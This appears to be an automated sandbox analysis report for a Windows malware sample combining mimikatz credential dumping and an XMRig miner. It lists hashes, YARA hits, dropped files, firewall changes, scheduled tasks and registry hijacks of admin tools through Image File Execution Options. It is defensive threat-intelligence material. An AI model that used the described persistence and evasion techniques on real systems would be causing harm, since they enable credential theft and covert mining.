mimikatz | 05f391b4bbebdcd4786f8a36949ca14c54b8556fd775bb78b75a006b07a74a44

Analysis

max time kernel
150s
max time network
154s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
13-03-2024 22:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe
Size

8.9MB
MD5

554bbfd67dd3b2945d26bbe00df15d8e
SHA1

b88199b2077375fa2678293ba37b6def0b169880
SHA256

05f391b4bbebdcd4786f8a36949ca14c54b8556fd775bb78b75a006b07a74a44
SHA512

697d989e57be85be2f2490bff506c4fcbedc8ff47e40c1e4f13f290715879c17cdcded62d295e1fa89eb661567c91f4f9b3931430e0048747617b6a6ea629e2c
SSDEEP

196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Score

10^/10

mimikatz xmrig discovery evasion miner persistence upx

Malware Config

Signatures

Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2660 created 280	2660	bybsswu.exe	17

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Contacts a large (21137) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs

resource	yara_rule
behavioral1/memory/2920-135-0x000000013FB90000-0x000000013FC7E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore
behavioral1/memory/2920-136-0x000000013FB90000-0x000000013FC7E000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

UPX dump on OEP (original entry point) 37 IoCs

resource	yara_rule
behavioral1/memory/2224-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral1/files/0x000c000000013a32-4.dat	UPX
behavioral1/files/0x000c000000013a32-6.dat	UPX
behavioral1/memory/2524-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	UPX
behavioral1/files/0x0005000000019c36-127.dat	UPX
behavioral1/memory/1636-133-0x0000000000600000-0x00000000006EE000-memory.dmp	UPX
behavioral1/memory/2920-135-0x000000013FB90000-0x000000013FC7E000-memory.dmp	UPX
behavioral1/memory/2920-136-0x000000013FB90000-0x000000013FC7E000-memory.dmp	UPX
behavioral1/files/0x000500000001a3f2-138.dat	UPX
behavioral1/memory/2556-142-0x000000013FEC0000-0x000000013FF1B000-memory.dmp	UPX
behavioral1/files/0x000500000001a079-143.dat	UPX
behavioral1/memory/2660-146-0x0000000002A90000-0x0000000002BB0000-memory.dmp	UPX
behavioral1/memory/2408-147-0x000000013FFF0000-0x0000000140110000-memory.dmp	UPX
behavioral1/memory/2556-168-0x000000013FEC0000-0x000000013FF1B000-memory.dmp	UPX
behavioral1/memory/2904-181-0x000000013FD20000-0x000000013FD7B000-memory.dmp	UPX
behavioral1/memory/2904-183-0x000000013FD20000-0x000000013FD7B000-memory.dmp	UPX
behavioral1/memory/2408-185-0x000000013FFF0000-0x0000000140110000-memory.dmp	UPX
behavioral1/memory/2620-190-0x000000013FF40000-0x000000013FF9B000-memory.dmp	UPX
behavioral1/memory/2620-192-0x000000013FF40000-0x000000013FF9B000-memory.dmp	UPX
behavioral1/memory/2408-198-0x000000013FFF0000-0x0000000140110000-memory.dmp	UPX
behavioral1/memory/2528-200-0x000000013F310000-0x000000013F36B000-memory.dmp	UPX
behavioral1/memory/2528-202-0x000000013F310000-0x000000013F36B000-memory.dmp	UPX
behavioral1/memory/2408-207-0x000000013FFF0000-0x0000000140110000-memory.dmp	UPX
behavioral1/memory/992-209-0x000000013FCD0000-0x000000013FD2B000-memory.dmp	UPX
behavioral1/memory/992-211-0x000000013FCD0000-0x000000013FD2B000-memory.dmp	UPX
behavioral1/memory/2652-217-0x000000013FC50000-0x000000013FCAB000-memory.dmp	UPX
behavioral1/memory/2652-219-0x000000013FC50000-0x000000013FCAB000-memory.dmp	UPX
behavioral1/memory/2408-221-0x000000013FFF0000-0x0000000140110000-memory.dmp	UPX
behavioral1/memory/2408-222-0x000000013FFF0000-0x0000000140110000-memory.dmp	UPX
behavioral1/memory/2408-224-0x000000013FFF0000-0x0000000140110000-memory.dmp	UPX
behavioral1/memory/2408-228-0x000000013FFF0000-0x0000000140110000-memory.dmp	UPX
behavioral1/files/0x0005000000019fd6-232.dat	UPX
behavioral1/files/0x0005000000019fd6-234.dat	UPX
behavioral1/memory/2408-245-0x000000013FFF0000-0x0000000140110000-memory.dmp	UPX
behavioral1/memory/2408-246-0x000000013FFF0000-0x0000000140110000-memory.dmp	UPX
behavioral1/memory/2408-247-0x000000013FFF0000-0x0000000140110000-memory.dmp	UPX
behavioral1/memory/2408-249-0x000000013FFF0000-0x0000000140110000-memory.dmp	UPX

XMRig Miner payload 11 IoCs

miner

resource	yara_rule
behavioral1/memory/2408-185-0x000000013FFF0000-0x0000000140110000-memory.dmp	xmrig
behavioral1/memory/2408-198-0x000000013FFF0000-0x0000000140110000-memory.dmp	xmrig
behavioral1/memory/2408-207-0x000000013FFF0000-0x0000000140110000-memory.dmp	xmrig
behavioral1/memory/2408-221-0x000000013FFF0000-0x0000000140110000-memory.dmp	xmrig
behavioral1/memory/2408-222-0x000000013FFF0000-0x0000000140110000-memory.dmp	xmrig
behavioral1/memory/2408-224-0x000000013FFF0000-0x0000000140110000-memory.dmp	xmrig
behavioral1/memory/2408-228-0x000000013FFF0000-0x0000000140110000-memory.dmp	xmrig
behavioral1/memory/2408-245-0x000000013FFF0000-0x0000000140110000-memory.dmp	xmrig
behavioral1/memory/2408-246-0x000000013FFF0000-0x0000000140110000-memory.dmp	xmrig
behavioral1/memory/2408-247-0x000000013FFF0000-0x0000000140110000-memory.dmp	xmrig
behavioral1/memory/2408-249-0x000000013FFF0000-0x0000000140110000-memory.dmp	xmrig

mimikatz is an open source tool to dump credentials on Windows 10 IoCs

resource	yara_rule
behavioral1/memory/2224-0-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral1/files/0x000c000000013a32-4.dat	mimikatz
behavioral1/files/0x000c000000013a32-6.dat	mimikatz
behavioral1/memory/2524-8-0x0000000000400000-0x0000000000A9B000-memory.dmp	mimikatz
behavioral1/memory/1636-134-0x0000000000600000-0x00000000006EE000-memory.dmp	mimikatz
behavioral1/memory/2920-135-0x000000013FB90000-0x000000013FC7E000-memory.dmp	mimikatz
behavioral1/memory/2920-136-0x000000013FB90000-0x000000013FC7E000-memory.dmp	mimikatz
behavioral1/memory/2660-197-0x0000000002A90000-0x0000000002BB0000-memory.dmp	mimikatz
behavioral1/files/0x0005000000019fd6-232.dat	mimikatz
behavioral1/files/0x0005000000019fd6-234.dat	mimikatz

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	bybsswu.exe
File created	C:\Windows\system32\drivers\npf.sys	wpcap.exe
File created	C:\Windows\system32\drivers\etc\hosts	bybsswu.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1604	netsh.exe
616	netsh.exe

Sets file execution options in registry 2 TTPs 40 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe	bybsswu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe	bybsswu.exe

Executes dropped EXE 16 IoCs

pid	Process
2524	bybsswu.exe
2660	bybsswu.exe
2740	wpcap.exe
2016	hzuqkpuek.exe
2920	vfshost.exe
2556	eszugbung.exe
2408	bsuyvg.exe
2028	xohudmc.exe
2844	kkqiuy.exe
2904	eszugbung.exe
2620	eszugbung.exe
2528	eszugbung.exe
992	eszugbung.exe
2652	eszugbung.exe
1416	bybsswu.exe
2260	liaekeiyb.exe

Loads dropped DLL 23 IoCs

pid	Process
1952	cmd.exe
1952	cmd.exe
2712	cmd.exe
2740	wpcap.exe
2740	wpcap.exe
2740	wpcap.exe
2740	wpcap.exe
2740	wpcap.exe
3044	cmd.exe
2016	hzuqkpuek.exe
2016	hzuqkpuek.exe
1636	cmd.exe
1636	cmd.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
2660	bybsswu.exe
1068	cmd.exe

UPX packed file 30 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0005000000019c36-127.dat	upx
behavioral1/memory/2920-135-0x000000013FB90000-0x000000013FC7E000-memory.dmp	upx
behavioral1/memory/2920-136-0x000000013FB90000-0x000000013FC7E000-memory.dmp	upx
behavioral1/files/0x000500000001a3f2-138.dat	upx
behavioral1/memory/2556-142-0x000000013FEC0000-0x000000013FF1B000-memory.dmp	upx
behavioral1/files/0x000500000001a079-143.dat	upx
behavioral1/memory/2660-146-0x0000000002A90000-0x0000000002BB0000-memory.dmp	upx
behavioral1/memory/2408-147-0x000000013FFF0000-0x0000000140110000-memory.dmp	upx
behavioral1/memory/2556-168-0x000000013FEC0000-0x000000013FF1B000-memory.dmp	upx
behavioral1/memory/2904-181-0x000000013FD20000-0x000000013FD7B000-memory.dmp	upx
behavioral1/memory/2904-183-0x000000013FD20000-0x000000013FD7B000-memory.dmp	upx
behavioral1/memory/2408-185-0x000000013FFF0000-0x0000000140110000-memory.dmp	upx
behavioral1/memory/2620-190-0x000000013FF40000-0x000000013FF9B000-memory.dmp	upx
behavioral1/memory/2620-192-0x000000013FF40000-0x000000013FF9B000-memory.dmp	upx
behavioral1/memory/2408-198-0x000000013FFF0000-0x0000000140110000-memory.dmp	upx
behavioral1/memory/2528-200-0x000000013F310000-0x000000013F36B000-memory.dmp	upx
behavioral1/memory/2528-202-0x000000013F310000-0x000000013F36B000-memory.dmp	upx
behavioral1/memory/2408-207-0x000000013FFF0000-0x0000000140110000-memory.dmp	upx
behavioral1/memory/992-209-0x000000013FCD0000-0x000000013FD2B000-memory.dmp	upx
behavioral1/memory/992-211-0x000000013FCD0000-0x000000013FD2B000-memory.dmp	upx
behavioral1/memory/2652-217-0x000000013FC50000-0x000000013FCAB000-memory.dmp	upx
behavioral1/memory/2652-219-0x000000013FC50000-0x000000013FCAB000-memory.dmp	upx
behavioral1/memory/2408-221-0x000000013FFF0000-0x0000000140110000-memory.dmp	upx
behavioral1/memory/2408-222-0x000000013FFF0000-0x0000000140110000-memory.dmp	upx
behavioral1/memory/2408-224-0x000000013FFF0000-0x0000000140110000-memory.dmp	upx
behavioral1/memory/2408-228-0x000000013FFF0000-0x0000000140110000-memory.dmp	upx
behavioral1/memory/2408-245-0x000000013FFF0000-0x0000000140110000-memory.dmp	upx
behavioral1/memory/2408-246-0x000000013FFF0000-0x0000000140110000-memory.dmp	upx
behavioral1/memory/2408-247-0x000000013FFF0000-0x0000000140110000-memory.dmp	upx
behavioral1/memory/2408-249-0x000000013FFF0000-0x0000000140110000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
21	ifconfig.me
22	ifconfig.me

Creates a Windows Service
persistence

Drops file in System32 directory 12 IoCs

description	ioc	Process
File created	C:\Windows\system32\wpcap.dll	wpcap.exe
File created	C:\Windows\system32\Packet.dll	wpcap.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	bybsswu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7ADF8A57305EF056A6A6A947A1CF4C7A	bybsswu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7ADF8A57305EF056A6A6A947A1CF4C7A	bybsswu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	bybsswu.exe
File created	C:\Windows\SysWOW64\wpcap.dll	wpcap.exe
File created	C:\Windows\SysWOW64\Packet.dll	wpcap.exe
File created	C:\Windows\SysWOW64\kkqiuy.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\kkqiuy.exe	xohudmc.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	bybsswu.exe
File created	C:\Windows\SysWOW64\pthreadVC.dll	wpcap.exe

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\WinPcap\LICENSE	wpcap.exe
File created	C:\Program Files\WinPcap\uninstall.exe	wpcap.exe
File created	C:\Program Files\WinPcap\rpcapd.exe	wpcap.exe

Drops file in Windows directory 60 IoCs

description	ioc	Process
File created	C:\Windows\mfebbbrby\tgykbkbiz\ip.txt	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\crli-0.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\posh-0.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\xdvl-0.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\svschost.exe	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\vimpcsvc.xml	bybsswu.exe
File created	C:\Windows\mfebbbrby\Corporate\mimilib.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\coli-0.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\Corporate\mimidrv.sys	bybsswu.exe
File created	C:\Windows\ime\bybsswu.exe	bybsswu.exe
File created	C:\Windows\mfebbbrby\tgykbkbiz\scan.bat	bybsswu.exe
File opened for modification	C:\Windows\mfebbbrby\tgykbkbiz\Packet.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\exma-1.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\tgykbkbiz\hzuqkpuek.exe	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\tibe-2.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\spoolsrv.exe	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\schoedcl.xml	bybsswu.exe
File opened for modification	C:\Windows\nubbucjk\bybsswu.exe	2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe
File created	C:\Windows\nubbucjk\spoolsrv.xml	bybsswu.exe
File created	C:\Windows\nubbucjk\vimpcsvc.xml	bybsswu.exe
File opened for modification	C:\Windows\nubbucjk\vimpcsvc.xml	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\AppCapture64.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\tgykbkbiz\Packet.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\tgykbkbiz\liaekeiyb.exe	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\schoedcl.exe	bybsswu.exe
File created	C:\Windows\mfebbbrby\Corporate\vfshost.exe	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\vimpcsvc.exe	bybsswu.exe
File created	C:\Windows\mfebbbrby\tgykbkbiz\wpcap.exe	bybsswu.exe
File opened for modification	C:\Windows\mfebbbrby\Corporate\log.txt	cmd.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\zlib1.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\AppCapture32.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\svschost.xml	bybsswu.exe
File created	C:\Windows\nubbucjk\schoedcl.xml	bybsswu.exe
File created	C:\Windows\nubbucjk\bybsswu.exe	2024-03-13_554bbfd67dd3b2945d26bbe00df15d8e_hacktools_icedid_mimikatz.exe
File created	C:\Windows\mfebbbrby\tgykbkbiz\wpcap.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\cnli-1.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\spoolsrv.xml	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\docmicfg.xml	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\schoedcl.xml	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\ucl.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\spoolsrv.xml	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\docmicfg.xml	bybsswu.exe
File created	C:\Windows\nubbucjk\svschost.xml	bybsswu.exe
File opened for modification	C:\Windows\mfebbbrby\tgykbkbiz\Result.txt	liaekeiyb.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\tucl-1.dll	bybsswu.exe
File opened for modification	C:\Windows\nubbucjk\spoolsrv.xml	bybsswu.exe
File opened for modification	C:\Windows\nubbucjk\schoedcl.xml	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\Shellcode.ini	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\libeay32.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\libxml2.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\trch-1.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\docmicfg.exe	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\svschost.xml	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\vimpcsvc.xml	bybsswu.exe
File created	C:\Windows\nubbucjk\docmicfg.xml	bybsswu.exe
File opened for modification	C:\Windows\nubbucjk\svschost.xml	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\ssleay32.dll	bybsswu.exe
File created	C:\Windows\mfebbbrby\UnattendGC\specials\trfo-2.dll	bybsswu.exe
File opened for modification	C:\Windows\nubbucjk\docmicfg.xml	bybsswu.exe
File created	C:\Windows\mfebbbrby\upbdrjv\swrpwe.exe	bybsswu.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1596	sc.exe
2804	sc.exe
1628	sc.exe
1148	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 6 IoCs

installer

resource	yara_rule
behavioral1/files/0x000c000000013a32-4.dat	nsis_installer_2
behavioral1/files/0x000c000000013a32-6.dat	nsis_installer_2
behavioral1/files/0x0007000000016d34-15.dat	nsis_installer_1
behavioral1/files/0x0007000000016d34-15.dat	nsis_installer_2
behavioral1/files/0x0005000000019fd6-232.dat	nsis_installer_2
behavioral1/files/0x0005000000019fd6-234.dat	nsis_installer_2

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
748	schtasks.exe
1572	schtasks.exe
1576	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	bybsswu.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	bybsswu.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	bybsswu.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	bybsswu.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	bybsswu.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1"	eszugbung.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	bybsswu.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4ED04C59-63BB-4540-8D25-31359484EE9F}	bybsswu.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4ED04C59-63BB-4540-8D25-31359484EE9F}\WpadDecision = "0"	bybsswu.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	eszugbung.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	bybsswu.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	bybsswu.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
